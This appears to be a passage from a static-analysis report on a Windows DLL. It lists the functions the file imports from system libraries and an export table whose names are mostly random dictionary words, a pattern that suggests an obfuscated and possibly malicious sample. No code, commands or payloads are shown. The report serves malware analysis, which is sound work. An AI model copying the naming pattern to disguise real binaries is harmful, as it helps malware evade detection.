                                                                                                                                                                                                  comsvcs.dllCosGetCallContext
                                                                                                                                                                                                  crypt32.dllCryptSIPLoad, CertCreateCertificateContext, CertFindExtension, CryptDecodeObject, CertFreeCertificateContext, CryptSIPRetrieveSubjectGuid
                                                                                                                                                                                                  dnsapi.dllDnsValidateName_A
                                                                                                                                                                                                  dsuiext.dllDllUnregisterServer
                                                                                                                                                                                                  gdi32.dllLineTo, CreateFontIndirectA, EnumFontFamiliesA, PolyBezier, GetCharWidthA, GetGlyphOutlineA, GetRegionData, ExtTextOutW, GetTextMetricsA, GetSystemPaletteEntries, OffsetRgn, SetPixel, DeleteObject, SetTextJustification, Polygon, GetOutlineTextMetricsA, SetMapMode, SetPolyFillMode, CreatePalette, CreateFontA, MoveToEx, SetPaletteEntries, RealizePalette, PtInRegion, CreateDIBSection, PatBlt, GetDeviceCaps, EnumFontFamiliesExA, GetCharacterPlacementA, GetObjectW, GetDIBits, GetGlyphOutlineW, GetTextMetricsW, CloseMetaFile, GetTextExtentPoint32A, GetPixel, Ellipse, CreateCompatibleBitmap, GetCharABCWidthsA, GetTextExtentPoint32W, GetRgnBox, SetViewportOrgEx, TranslateCharsetInfo, SelectClipRgn, SelectObject, CreateRectRgn, GetTextAlign, FillRgn, RestoreDC, CreatePen, GetCharacterPlacementW, Rectangle, SetDIBits, CreateSolidBrush, CreateHatchBrush, CreateDCW, SetTextColor, SetBkColor, SetBrushOrgEx, Arc, TextOutA, SelectPalette, BitBlt, SetTextAlign, CombineRgn, SetROP2, GetClipBox, LPtoDP, CreateFontIndirectW, UnrealizeObject, CreateCompatibleDC, CreateBitmap, CreateDIBitmap, Chord, SetBkMode, GetFontLanguageInfo, SetArcDirection, GetSystemPaletteUse, ExtTextOutA, StretchDIBits, SetTextCharacterExtra, SetRectRgn, GetCurrentObject, DeleteMetaFile, SetWindowExtEx, RoundRect, GetObjectA, CreateRectRgnIndirect, SetBitmapBits, SaveDC, CreateMetaFileA, GetTextExtentPointA, GetStockObject, SetDIBColorTable, SetWindowOrgEx, Pie, CreatePatternBrush, CreateBrushIndirect, DeleteDC, CreateDCA
                                                                                                                                                                                                  iassvcs.dllIASVariantChangeType
                                                                                                                                                                                                  imm32.dllImmEnumRegisterWordA, ImmEnumRegisterWordW
                                                                                                                                                                                                  kernel32.dllCreateThread, IsBadCodePtr, ReadFile, SetLastError, HeapCompact, GetThreadContext, IsValidCodePage, FindResourceExA, HeapFree, MapViewOfFile, GetEnvironmentStrings, ChangeTimerQueueTimer, _llseek, GetStringTypeW, OpenMutexW, CopyFileW, GetCurrentDirectoryW, SetEvent, GetConsoleWindow, FlushFileBuffers, LockResource, FindNextFileA, LCMapStringA, TryEnterCriticalSection, CreateProcessA, ReleaseSemaphore, CreateDirectoryA, GetTempFileNameW, QueryPerformanceFrequency, GlobalUnlock, DeleteCriticalSection, SetErrorMode, GlobalLock, ExitThread, GetDiskFreeSpaceExW, GetSystemTimeAdjustment, CreateFileMappingA, TlsFree, HeapCreate, OutputDebugStringA, lstrcatW, InitAtomTable, GetProcAddress, SystemTimeToFileTime, LeaveCriticalSection, GetLocaleInfoA, GlobalAddAtomA, LocalFree, GetTimeFormatA, GetShortPathNameW, CreateSemaphoreW, GetUserDefaultLCID, WritePrivateProfileStringW, WaitForMultipleObjectsEx, LockFileEx, TerminateProcess, CreateFileMappingW, SetFileAttributesW, GetModuleFileNameA, LocalReAlloc, GetQueuedCompletionStatus, GetDriveTypeW, GetCurrentProcess, HeapSize, WideCharToMultiByte, DeviceIoControl, MoveFileW, lstrcmpW, GetExitCodeThread, GetConsoleScreenBufferInfo, SetEndOfFile, GetUserDefaultUILanguage, ResumeThread, RemoveDirectoryW, FindNextFileW, GlobalReAlloc, PostQueuedCompletionStatus, SetLocalTime, GetModuleFileNameW, GetNumberOfConsoleInputEvents, FindResourceW, GetSystemInfo, lstrcpynW, SetEnvironmentVariableW, DebugBreak, GetDateFormatW, GetPrivateProfileSectionNamesW, GetVersionExW, IsValidLocale, GetThreadLocale, SetCurrentDirectoryA, SetThreadPriority, lstrcmpiA, VirtualQuery, GetStringTypeA, ExitProcess, GetCurrentThreadId, GetSystemTime, GetStartupInfoW, GetLastError, GetEnvironmentVariableA, LoadResource, IsDBCSLeadByteEx, Sleep, FindResourceExW, GetLongPathNameW, TlsGetValue, CreateProcessW, HeapAlloc, DeactivateActCtx, GetSystemWindowsDirectoryA, GetConsoleCP, CreateIoCompletionPort, CreatePipe, FileTimeToSystemTime, SetThreadLocale, GetVersionExA, GlobalHandle, TlsSetValue, GetUserDefaultLangID, GetNumberFormatW, lstrlenW, UnlockFileEx, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetModuleHandleA, LockFile, VerSetConditionMask, GetCurrentDirectoryA, HeapDestroy, GetFullPathNameW, GetDateFormatA, OpenEventA, InterlockedCompareExchange, OutputDebugStringW, AddAtomA, GetEnvironmentVariableW, SetFilePointerEx, GlobalSize, lstrcpyA, DelayLoadFailureHook, FindResourceA, CreateSemaphoreA, VirtualProtect, UnmapViewOfFile, GetEnvironmentStringsW, GetComputerNameA, GetTimeFormatW, _lopen, OpenMutexA, lstrcatA, _lclose, GetConsoleOutputCP, SetFileAttributesA, lstrcmpA, GetExitCodeProcess, lstrcpyW, FindFirstFileA, GetCommandLineW, SetStdHandle, GetDiskFreeSpaceA, UnlockFile, SizeofResource, IsBadReadPtr, CreateMutexW, GetStdHandle, LoadLibraryExA, SetConsoleCtrlHandler, LocalFileTimeToFileTime, IsBadStringPtrW, SetCurrentDirectoryW, GetStringTypeExW, FreeEnvironmentStringsA, DeleteFileA, WinExec, AllocConsole, lstrcmpiW, GetConsoleMode, InterlockedExchangeAdd, LoadLibraryExW, EnumSystemLocalesA, MoveFileA, PeekConsoleInputA, FileTimeToLocalFileTime, VerifyVersionInfoW, CompareFileTime, DeleteFileW, GetPrivateProfileIntW, _lread, GetACP, WriteConsoleW, FreeEnvironmentStringsW, GetModuleHandleW, GetTimeZoneInformation, GlobalMemoryStatus, GetSystemDirectoryW, _lwrite, ReadConsoleA, lstrcpynA, VirtualProtectEx, WaitForMultipleObjects, GetFullPathNameA, DeleteTimerQueueTimer, CreateFileW, ActivateActCtx, LoadLibraryA, FormatMessageW, CreateTimerQueueTimer, WritePrivateProfileStructW, GetVersion, ReadConsoleInputW, GetProcessHeap, IsBadWritePtr, MultiByteToWideChar, CreateDirectoryW, GlobalAlloc, GetFileAttributesW, GlobalDeleteAtom, LCMapStringW, WritePrivateProfileSectionW, WaitForSingleObjectEx, RtlUnwind, GetLocaleInfoW, GetCPInfo, WaitForSingleObject, FindFirstFileW, MulDiv, FormatMessageA, InterlockedIncrement, FlushInstructionCache, FreeResource, VirtualAlloc, FlushViewOfFile, GetTempPathW, OpenEventW, GetSystemWow64DirectoryW, RaiseException, InitializeCriticalSection, SetThreadAffinityMask, GetFileTime, PeekNamedPipe, CloseHandle, WriteConsoleA, GetSystemDirectoryA, VirtualFree, ExpandEnvironmentStringsA, SetFileTime, SetFilePointer, WriteFile, DuplicateHandle, ResetEvent, SetPriorityClass, GetFileAttributesA, GetTempPathA, CompareStringW, GetFileSize, SetEnvironmentVariableA, DeleteAtom, QueueUserWorkItem, GetWindowsDirectoryW, VirtualQueryEx, GetCommandLineA, _lcreat, SwitchToThread, ReadConsoleW, FindAtomA, FatalAppExitA, GetProcessAffinityMask, ExpandEnvironmentStringsW, ReleaseMutex, LoadLibraryW, CreateEventA, GetOEMCP, SetHandleCount, CompareStringA, SetConsoleMode, GetPrivateProfileStringW, Beep, GetCurrentThread, ReadConsoleInputA, RemoveDirectoryA, CreateEventW, SleepEx, HeapWalk, GetCurrentProcessId, IsDBCSLeadByte, InterlockedExchange, GetBinaryTypeA, PulseEvent, TlsAlloc, OpenFileMappingA, GetLocalTime, TerminateThread, lstrlenA, GetSystemDefaultLangID, GetStartupInfoA, GetTempFileNameA, EnterCriticalSection, CreateMutexA, InterlockedDecrement, CreateActCtxW, GetSystemWindowsDirectoryW, SetUnhandledExceptionFilter, GetPrivateProfileStructW, GetComputerNameW, GetFileInformationByHandle, SystemTimeToTzSpecificLocalTime, QueryPerformanceCounter, GetPrivateProfileSectionW, LocalAlloc, SuspendThread, UnhandledExceptionFilter, CreateFileA, FreeLibrary, FindClose, GlobalFree, IsProcessorFeaturePresent, HeapValidate, OpenProcess, DosDateTimeToFileTime, GetFileType, GetTickCount, IsDebuggerPresent, GetDriveTypeA, ReleaseActCtx, MoveFileExW
                                                                                                                                                                                                  licmgr10.dllDllUnregisterServer
                                                                                                                                                                                                  mscat32.dllCryptCATAdminReleaseContext, CryptCATCatalogInfoFromContext, CryptCATAdminEnumCatalogFromHash, CryptCATAdminAcquireContext
                                                                                                                                                                                                  mscms.dllInstallColorProfileW, GetColorDirectoryW, AssociateColorProfileWithDeviceW
                                                                                                                                                                                                  msports.dllSerialPortPropPageProvider
                                                                                                                                                                                                  msvcp60.dll?_Xlen@std@@YAXXZ, ?nothrow@std@@3Unothrow_t@1@B, ?_Xran@std@@YAXXZ
                                                                                                                                                                                                  msvcrt.dllmktime, modf, strlen, wcsrchr, sqrt, _ultoa, wcstok, _amsg_exit, _fpclass, _mbsnbcpy, mbstowcs, _mbsicmp, _HUGE, wcsncmp, _wsplitpath, iswctype, sscanf, iswspace, _clearfp, memcmp, _onexit, memset, wcsstr, _mbstok, _finite, _unlock, wcscmp, _strtime, iswpunct, fread, atoi, towlower, _wcsicmp, _endthreadex, __dllonexit, _control87, strchr, isspace, _vsnwprintf, realloc, _cexit, _itow, memcpy, _vsnprintf, _aligned_malloc, setlocale, free, localtime, _wmakepath, _wtol, bsearch, _snwprintf, wcstombs, atol, toupper, strrchr, _strdup, wcstol, iswascii, _snprintf, wcstod, __CxxFrameHandler, __getmainargs, strncmp, qsort, isalnum, _aligned_free, _wfindnext, _wcsupr, _controlfp, _tempnam, _fdopen, _ltow, _wtoi, floor, iswdigit, _wfopen, _ftime, calloc, _lock, _strdate, vswprintf, _XcptFilter, wcschr, _strnicmp, memmove, _CxxThrowException, strncpy, _ultow, fflush, longjmp, ceil, _beginthread, cos, printf, _errno, fclose, _mbsncpy, malloc, wcscat, wcscpy, wcsspn, frexp, _mbscpy, _stricmp, _callnewh, strcmp, _findclose, time, __set_app_type, _wcslwr, _wtoi64, __RTDynamicCast, isdigit, _wfindfirst, swprintf, _wchdir, __setusermatherr, ldexp, strstr, isxdigit, wcsncpy, _exit, _iob, iswalpha, _wcsnicmp, sprintf, iswupper, sin, wcstoul, exit, srand, _mbslen, setvbuf, _purecall, wcsncat, __initenv, swscanf, fprintf, tolower, wcslen, isalpha, fopen, _setmbcp, _initterm, rand, ?terminate@@YAXXZ, atof, strncat, _open_osfhandle, _isnan
                                                                                                                                                                                                  netapi32.dllNetShareDel, NetLocalGroupAddMembers, NetLocalGroupDelMembers, NetApiBufferFree, NetUserSetInfo, NetUserDel, NetUserGetLocalGroups, DsGetDcNameW
                                                                                                                                                                                                  ntdll.dllNtCreatePort, NtSetInformationFile, NtSetValueKey, NtFlushVirtualMemory, NtOpenObjectAuditAlarm, NtSetInformationThread, _vsnprintf, NtQueryValueKey, RtlDeleteSecurityObject, RtlGetNtVersionNumbers, towlower, RtlEnterCriticalSection, wcsrchr, RtlFreeHeap, _wcsnicmp, NtUnmapViewOfSection, RtlInitializeCriticalSection, RtlAcquireResourceShared, NtCreateSection, NtReadFile, RtlCopyUnicodeString, _wcsicmp, NtCreateFile, RtlAcquireResourceExclusive, NtReplyWaitReceivePort, NtExtendSection, wcsncmp, NtPrivilegeObjectAuditAlarm, _ltow, RtlAreAllAccessesGranted, NtOpenProcessToken, NtWriteFile, RtlDeregisterWait, RtlDosPathNameToNtPathName_U, NtQuerySystemTime, RtlAllocateAndInitializeSid, NtClose, RtlCompareMemory, RtlCreateHeap, NtAccessCheck, NtOpenKey, RtlFreeAnsiString, RtlUnwind, RtlReleaseResource, RtlFreeUnicodeString, RtlFreeSid, NtCreateEvent, RtlInitializeResource, RtlNtStatusToDosError, NtOpenFile, RtlAnsiStringToUnicodeString, RtlUnicodeStringToAnsiString, NlsMbCodePageTag, RtlLeaveCriticalSection, NtAcceptConnectPort, atol, RtlRaiseStatus, NtAdjustPrivilegesToken, NtDuplicateToken, NtQueryInformationFile, RtlExpandEnvironmentStrings_U, RtlDeleteResource, RtlInitUnicodeString, NtOpenProcess, NtEnumerateKey, RtlCreateUserSecurityObject, RtlxUnicodeStringToAnsiSize, RtlDeleteCriticalSection, RtlTimeToSecondsSince1970, RtlLengthSid, NtPrivilegeCheck, RtlConvertSidToUnicodeString, RtlRegisterWait, NtQueryAttributesFile, NtDuplicateObject, _vsnwprintf, NtPulseEvent, NtMapViewOfSection, NtOpenThreadToken, RtlAllocateHeap, NtNotifyChangeKey, RtlQueueWorkItem, NtCloseObjectAuditAlarm, NtCompleteConnectPort, RtlAdjustPrivilege
                                                                                                                                                                                                  occache.dllFindFirstControl
                                                                                                                                                                                                  odbccu32.dllSQLSetDescRec
                                                                                                                                                                                                  ole32.dllStringFromIID, OleSaveToStream, CoTaskMemFree, CoCreateInstance, PropVariantClear, StringFromGUID2, CoGetMalloc, OleRegEnumVerbs, ComPs_NdrDllUnregisterProxy, StringFromCLSID, CLSIDFromProgID, CreateDataAdviseHolder, OleRegGetMiscStatus, ComPs_NdrDllGetClassObject, CoInitializeEx, CoTaskMemAlloc, CoGetInterceptor, CreateStreamOnHGlobal, StgOpenStorage, CoTaskMemRealloc, CoGetClassObject, CoCreateFreeThreadedMarshaler, CreateBindCtx, WriteClassStm, CoImpersonateClient, CreateOleAdviseHolder, StgOpenStorageEx, ReleaseStgMedium, CoRevertToSelf, ComPs_NdrDllRegisterProxy, CoCreateGuid, CoSetProxyBlanket, CLSIDFromString, CoDisconnectObject, OleRegGetUserType, CoUninitialize, CoInitializeSecurity, CoInitialize
                                                                                                                                                                                                  olesvr32.dllTerminateClients
                                                                                                                                                                                                  pdh.dllPdhParseCounterPathW, PdhBrowseCountersW, PdhTranslateLocaleCounterW, PdhTranslate009CounterW
                                                                                                                                                                                                  psapi.dllGetModuleFileNameExW
                                                                                                                                                                                                  rpcrt4.dllUuidCreateSequential, I_RpcBindingInqLocalClientPID, I_RpcMapWin32Status, IUnknown_AddRef_Proxy, RpcStringBindingParseW, RpcImpersonateClient, UuidCompare, CStdStubBuffer_QueryInterface, NdrDllGetClassObject, RpcBindingFree, RpcBindingToStringBindingW, UuidCreate, NdrServerCall2, UuidCreateNil, CStdStubBuffer_Connect, RpcStringFreeA, NdrOleFree, NdrDllRegisterProxy, NdrDllCanUnloadNow, UuidHash, CStdStubBuffer_AddRef, RpcStringFreeW, CStdStubBuffer_DebugServerRelease, NdrCStdStubBuffer_Release, IUnknown_Release_Proxy, CStdStubBuffer_DebugServerQueryInterface, RpcBindingServerFromClient, RpcServerRegisterIfEx, CStdStubBuffer_IsIIDSupported, RpcServerUseProtseqEpW, CStdStubBuffer_CountRefs, IUnknown_QueryInterface_Proxy, NdrDllUnregisterProxy, UuidFromStringA, RpcRevertToSelf, NdrOleAllocate, CStdStubBuffer_Invoke, UuidToStringA, I_RpcBindingIsClientLocal, UuidToStringW, CStdStubBuffer_Disconnect
                                                                                                                                                                                                  rtutils.dllTraceRegisterExW, TraceVprintfExA, TraceDeregisterW
                                                                                                                                                                                                  scecli.dllSceSvcGetInformationTemplate, SceGetScpProfileDescription, SceRollbackTransaction, SceCopyBaseProfile, SceFreeProfileMemory, SceUpdateSecurityProfile, SceAddToNameStatusList, SceAnalyzeSystem, SceOpenProfile, SceAddToNameList, SceAppendSecurityProfileInfo, SceCompareSecurityDescriptors, SceGetServerProductType, SceFreeMemory, SceCommitTransaction, SceSvcUpdateInfo, SceSvcSetInformationTemplate, SceUpdateObjectInfo, SceCreateDirectory, SceSvcQueryInfo, SceCloseProfile, SceConfigureSystem, SceWriteSecurityProfileInfo, SceStartTransaction, SceEnumerateServices, SceCompareNameList, SceGetObjectSecurity, SceSetupGenerateTemplate, SceGetSecurityProfileInfo, SceSvcFree, SceLookupPrivRightName, SceSvcConvertTextToSD, SceGetObjectChildren
                                                                                                                                                                                                  secur32.dllLsaRegisterPolicyChangeNotification, DeleteSecurityPackageA
                                                                                                                                                                                                  setupapi.dllSetupTermDefaultQueueCallback, SetupDiGetDeviceInfoListDetailW, SetupCommitFileQueueW, SetupOpenAppendInfFileW, SetupDiCreateDevRegKeyW, SetupDiCreateDeviceInterfaceW, SetupOpenInfFileW, SetupInstallFromInfSectionW, SetupCloseInfFile, SetupInstallServicesFromInfSectionW, SetupGetMultiSzFieldW, SetupDiGetDeviceInterfaceDetailW, SetupGetIntField, SetupDiGetWizardPage, SetupDiSetSelectedDevice, SetupDiOpenDeviceInterfaceRegKey, SetupQueryInfFileInformationW, SetupOpenFileQueue, SetupDiGetDriverInstallParamsW, SetupQueryInfVersionInformationW, SetupDiCreateDeviceInfoList, SetupDiDeleteDeviceInterfaceRegKey, SetupFindNextMatchLineW, SetupFindFirstLineW, SetupDiGetClassDevsW, SetupDiCreateDeviceInfoW, SetupDiClassGuidsFromNameW, SetupDiGetClassInstallParamsW, SetupDiEnumDriverInfoW, SetupInitDefaultQueueCallbackEx, SetupDiRemoveDeviceInterface, SetupSetDirectoryIdW, SetupDiDeleteDevRegKey, SetupDiGetSelectedDevice, SetupDiGetDeviceInstallParamsW, SetupDiEnumDeviceInterfaces, SetupDiEnumDeviceInfo, SetupDiGetDriverInfoDetailW, SetupDiOpenClassRegKeyExW, SetupQueryInfOriginalFileInformationW, SetupInitDefaultQueueCallback, SetupDiGetActualSectionToInstallW, SetupDiRegisterDeviceInfo, SetupDiCreateDeviceInterfaceRegKeyW, SetupDiGetSelectedDriverW, SetupCloseFileQueue, SetupDiOpenDevRegKey, SetupSetPlatformPathOverrideW, SetupDiCallClassInstaller, SetupGetLineByIndexW, CM_Get_Device_ID_ExW, SetupInstallFilesFromInfSectionW, SetupScanFileQueueW, SetupFindNextLine, SetupGetLineCountW, SetupGetInfInformationW, SetupDiSetDriverInstallParamsW, SetupDefaultQueueCallbackW, SetupDiDestroyDeviceInfoList, SetupDiSetDeviceInstallParamsW, SetupDiGetDeviceRegistryPropertyW, SetupDiRemoveDevice, SetupDiInstallDevice, SetupDiClassNameFromGuidW, SetupGetStringFieldW, SetupDiSetClassInstallParamsW
                                                                                                                                                                                                  shell32.dllSHBrowseForFolderW, CommandLineToArgvW, SHGetDesktopFolder, ShellExecuteW, SHGetPathFromIDListW, ExtractIconExW, SHGetFolderPathW, SHChangeNotify, SHSetLocalizedName, SHParseDisplayName, ShellExecuteExW, SHGetSettings, SHBindToParent, SHGetFileInfoW, SHGetSpecialFolderPathW, SHGetSpecialFolderLocation, SHGetMalloc
                                                                                                                                                                                                  shlwapi.dllPathFindFileNameW, SHQueryValueExW, SHGetThreadRef, StrCmpIW, PathIsDirectoryEmptyW, PathRemoveBlanksW, StrFormatByteSizeW, StrRChrW, StrToIntW, PathFileExistsW, PathIsDirectoryW, StrFormatKBSizeW, AssocCreate, PathAppendW, SHStrDupW, PathCombineW, PathRemoveFileSpecW, PathIsRelativeA, StrRetToBufW, StrDupW, PathFindExtensionW, StrCmpW, StrCmpLogicalW, PathGetDriveNumberW
                                                                                                                                                                                                  tapi32.dlllineGetTranslateCapsW, lineShutdown, lineInitialize, lineTranslateAddressW
                                                                                                                                                                                                  urlmon.dllCoGetClassObjectFromURL, HlinkSimpleNavigateToString, URLOpenStreamA, URLOpenBlockingStreamA, CreateAsyncBindCtx
                                                                                                                                                                                                  user32.dllSendDlgItemMessageW, EndDeferWindowPos, MessageBoxW, GetMessagePos, GetDesktopWindow, GetIconInfo, VkKeyScanA, LoadCursorW, UpdateWindow, IsDialogMessageA, SetPropA, DefWindowProcA, BeginPaint, DialogBoxIndirectParamW, wsprintfW, UnhookWindowsHookEx, SetWindowPos, IsClipboardFormatAvailable, SetRect, wsprintfA, GetKeyState, DestroyWindow, GetCapture, SetDlgItemTextA, KillTimer, GetCursor, ClientToScreen, RegisterClassW, GetDC, ExitWindowsEx, IsWindowUnicode, ShowOwnedPopups, CopyImage, GetThreadDesktop, DrawFrameControl, ToAscii, GetClipCursor, GetWindowThreadProcessId, InvalidateRgn, ChildWindowFromPointEx, SetForegroundWindow, CharLowerW, WindowFromPoint, GetDoubleClickTime, AppendMenuW, AdjustWindowRectEx, IsWindowEnabled, CharPrevW, ChangeDisplaySettingsA, GetClassNameW, DispatchMessageA, GetWindowDC, GetDlgItemTextA, GetWindow, SetWindowLongW, EnumWindows, SetWindowTextW, TrackPopupMenu, DestroyMenu, GetWindowLongW, GetKeyboardState, GetClassLongA, GetCursorPos, GetSystemMenu, CreateCursor, DeleteMenu, FillRect, SetFocus, GetFocus, GetWindowTextW, CloseClipboard, GetForegroundWindow, DialogBoxIndirectParamA, SetWindowRgn, TranslateMessage, PostThreadMessageW, SetScrollPos, GetSystemMetrics, PostThreadMessageA, SendMessageTimeoutW, ShowWindow, MessageBeep, SendMessageTimeoutA, RegisterWindowMessageA, CharUpperA, DefWindowProcW, IsIconic, GetMessageA, LoadImageA, GetMenuItemCount, SystemParametersInfoA, SetMenu, SetWindowsHookExW, SetCursorPos, EnableWindow, DrawMenuBar, CreateIconFromResourceEx, ScreenToClient, wvsprintfA, LoadBitmapW, GetClassInfoExA, SendMessageA, EmptyClipboard, RegisterClipboardFormatW, GetWindowRect, GetMenuItemInfoW, DrawIcon, GetUserObjectInformationA, SetClipboardData, EnableMenuItem, ScrollWindow, GetClassNameA, CheckMenuItem, CreateDialogParamA, LoadStringA, GetMenuItemInfoA, IsWindowVisible, SendDlgItemMessageA, mouse_event, CreateIconIndirect, GetWindowRgn, GetShellWindow, DestroyIcon, LoadCursorA, DrawTextW, SendMessageW, SetScrollRange, GetMenuState, RegisterClassExA, IsRectEmpty, MessageBoxA, CreateDialogParamW, ReleaseDC, SetKeyboardState, SetCapture, WinHelpW, UnregisterClassA, GetParent, OffsetRect, CheckDlgButton, GetActiveWindow, FindWindowA, DrawFocusRect, RedrawWindow, GetWindowTextLengthA, GetWindowLongA, SetDlgItemTextW, ScrollWindowEx, MoveWindow, RemovePropA, SetTimer, IntersectRect, FindWindowW, DialogBoxParamA, OemToCharBuffA, MapVirtualKeyA, DrawTextA, GetScrollInfo, DefMDIChildProcA, ModifyMenuA, ReleaseCapture, SwitchToThisWindow, SetMenuDefaultItem, InvalidateRect, LoadStringW, LoadMenuA, CreatePopupMenu, GetMessageW, CallNextHookEx, LoadIconA, OpenDesktopA, BringWindowToTop, LoadImageW, RegisterClassA, GetLastActivePopup, DefDlgProcA, SystemParametersInfoW, PostQuitMessage, DeferWindowPos, keybd_event, CreateWindowExW, BeginDeferWindowPos, DispatchMessageW, GetSysColor, DrawIconEx, DrawEdge, ChangeDisplaySettingsExA, LoadBitmapA, SetWindowTextA, CharNextA, CharUpperW, SetScrollInfo, LoadIconW, MsgWaitForMultipleObjects, GetWindowTextA, GetDlgItemTextW, InflateRect, GetPropA, OpenInputDesktop, EndPaint, MapWindowPoints, DestroyCursor, RemoveMenu, SetThreadDesktop, PostMessageA, LoadMenuW, wvsprintfW, GetClientRect, OpenClipboard, DialogBoxParamW, WinHelpA, CharNextW, GetMenuDefaultItem, EnableScrollBar, IsWindow, SetRectEmpty, PostMessageW, SetCursor, PtInRect, GetDlgCtrlID, EndDialog, IsDlgButtonChecked, CharPrevA, CharToOemBuffA, UnionRect, CloseDesktop, FrameRect, GetSubMenu, SetWindowsHookExA, EqualRect, SetWindowLongA, CreateWindowExA
                                                                                                                                                                                                  userenv.dllExpandEnvironmentStringsForUserW
                                                                                                                                                                                                  uxtheme.dllGetThemeSysColor
                                                                                                                                                                                                  version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                                                                                  wininet.dllInternetCombineUrlA
                                                                                                                                                                                                  winmm.dlltimeBeginPeriod, timeKillEvent, timeGetDevCaps, timeSetEvent, timeEndPeriod
                                                                                                                                                                                                  winrnr.dllRemoveNTDSProvider
                                                                                                                                                                                                  winscard.dllSCardIntroduceCardTypeW, SCardEstablishContext, SCardReleaseContext, SCardForgetCardTypeW
                                                                                                                                                                                                  winspool.drvClosePrinter, GetPrintProcessorDirectoryW, SetPrinterW, EnumPrinterDataExW, OpenPrinterW, GetPrinterW, EnumPrinterKeyW, EndDocPrinter, GetPrinterDriverDirectoryW, StartDocPrinterW, WritePrinter, EnumJobsW, GetPrinterDriverW, GetJobW, GetPrinterDataExW, EnumPrinterDriversW, SetJobW
                                                                                                                                                                                                  wintrust.dllCryptCATAdminReleaseContext, CryptCATAdminCalcHashFromFileHandle, CryptCATCatalogInfoFromContext, CryptCATAdminEnumCatalogFromHash, CryptCATAdminAcquireContext
                                                                                                                                                                                                  xolehlp.dllDtcGetTransactionManagerExA

                                                                                                                                                                                                  Exports

                                                                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                                                                  Tachycardiac10x4013ec
                                                                                                                                                                                                  Thumbmark20x4017c1
                                                                                                                                                                                                  Providable30x4018e8
                                                                                                                                                                                                  Trimesitinic40x401a1b
                                                                                                                                                                                                  Molary50x401a8b
                                                                                                                                                                                                  Homocoela60x401b25
                                                                                                                                                                                                  Septarium70x401df0
                                                                                                                                                                                                  Elaphodus80x401f39
                                                                                                                                                                                                  Mondayish90x4020c7
                                                                                                                                                                                                  Humanism100x402267
                                                                                                                                                                                                  Elderliness110x40249a
                                                                                                                                                                                                  Syndesmotic120x40262d
                                                                                                                                                                                                  Anoxidative130x402790
                                                                                                                                                                                                  Mulla140x40281c
                                                                                                                                                                                                  Fulgurator150x402920
                                                                                                                                                                                                  Pilea160x40299f
                                                                                                                                                                                                  DllRegisterServer170x402a1a
                                                                                                                                                                                                  Corymbiferous180x402bb3
                                                                                                                                                                                                  Nonparochial190x402c88
                                                                                                                                                                                                  Intersomnial200x402e6b
                                                                                                                                                                                                  Chromidae210x402f4a
                                                                                                                                                                                                  Frimaire220x403127
                                                                                                                                                                                                  Bravade230x403222
                                                                                                                                                                                                  Verrucosity240x403293
                                                                                                                                                                                                  Oxammite250x403580
                                                                                                                                                                                                  Unaccountably260x4037ac
                                                                                                                                                                                                  Polystichous270x4039c5
                                                                                                                                                                                                  Microcephal280x403bad
                                                                                                                                                                                                  Obligatorily290x403ce1
                                                                                                                                                                                                  Cynophile300x403d42
                                                                                                                                                                                                  Incudomalleal310x403f59
                                                                                                                                                                                                  Vanner320x403fc2
                                                                                                                                                                                                  Lowan330x404078
                                                                                                                                                                                                  Photomechanically340x4040d3
                                                                                                                                                                                                  Basketing350x404276
                                                                                                                                                                                                  Partitioner360x4044a6
                                                                                                                                                                                                  Orneriness370x404646
                                                                                                                                                                                                  Scragging380x404753
                                                                                                                                                                                                  Rubicelle390x4048a7
                                                                                                                                                                                                  Persulphocyanic400x404ac8
                                                                                                                                                                                                  Shovelbill410x404c51
                                                                                                                                                                                                  Acidophilic420x404ea2
                                                                                                                                                                                                  Xylotypographic430x404fb9
                                                                                                                                                                                                  Clethra440x405089
                                                                                                                                                                                                  Unroller450x4051af
                                                                                                                                                                                                  Chippable460x40535d
                                                                                                                                                                                                  Quilleted470x4054c5
                                                                                                                                                                                                  Bronchoaspergillosis480x405b2d
                                                                                                                                                                                                  Insociably490x405d4c
                                                                                                                                                                                                  Bebothered500x405e9d
                                                                                                                                                                                                  Thiocarbonate510x405eef
                                                                                                                                                                                                  Ignatianist520x40612b
                                                                                                                                                                                                  Counteracting530x406225
                                                                                                                                                                                                  Renownedly540x406526
                                                                                                                                                                                                  DllUnregisterServer550x42e6cc
                                                                                                                                                                                                  Parachromophoric560x406751
                                                                                                                                                                                                  Ordinative570x4067c3
                                                                                                                                                                                                  Postclassical580x40685f
                                                                                                                                                                                                  Hospitably590x406938
                                                                                                                                                                                                  Superflexion600x406d01
                                                                                                                                                                                                  Prepositional610x406dc9
                                                                                                                                                                                                  Ulmaceous620x406e09
                                                                                                                                                                                                  Microcolorimetrically630x406f0c
                                                                                                                                                                                                  Sleepingly640x40704f
                                                                                                                                                                                                  Strawfork650x4070d9
                                                                                                                                                                                                  Tranquillization660x40720d
                                                                                                                                                                                                  Myophan670x4073ac
                                                                                                                                                                                                  Unsurgical680x4075b6
                                                                                                                                                                                                  Gymnetrous690x4076af
                                                                                                                                                                                                  Antiphonetic700x407acf
                                                                                                                                                                                                  Arui710x407e7e
                                                                                                                                                                                                  Mufty720x407ecb
                                                                                                                                                                                                  DllCanUnloadNow730x4080ae
                                                                                                                                                                                                  Aluminosis740x408262
                                                                                                                                                                                                  Entapophysial750x408425
                                                                                                                                                                                                  Withoutdoors760x408458
                                                                                                                                                                                                  Unimprovably770x4084df
                                                                                                                                                                                                  Acetenyl780x40859a
                                                                                                                                                                                                  Panlogism790x4085ff
                                                                                                                                                                                                  Hemigastrectomy800x408685
                                                                                                                                                                                                  Athetoid810x408faf
                                                                                                                                                                                                  Worshipfully820x409026
                                                                                                                                                                                                  Panbabylonism830x40940a
                                                                                                                                                                                                  Alloplastic840x409531
                                                                                                                                                                                                  Talak850x40961b
                                                                                                                                                                                                  Nonstatement860x4096ea
                                                                                                                                                                                                  Mesaticephalism870x409751
                                                                                                                                                                                                  Concaveness880x4097ad
                                                                                                                                                                                                  Sweepback890x409879
                                                                                                                                                                                                  Nagatelite900x4098de
                                                                                                                                                                                                  Tarsius910x40997e
                                                                                                                                                                                                  Texturally920x409a93
                                                                                                                                                                                                  Undignifiedly930x409aeb
                                                                                                                                                                                                  Uterotubal940x409db3
                                                                                                                                                                                                  Candareen950x409e6d
                                                                                                                                                                                                  Chirotes960x409ed7
                                                                                                                                                                                                  Treacherousness970x40a041
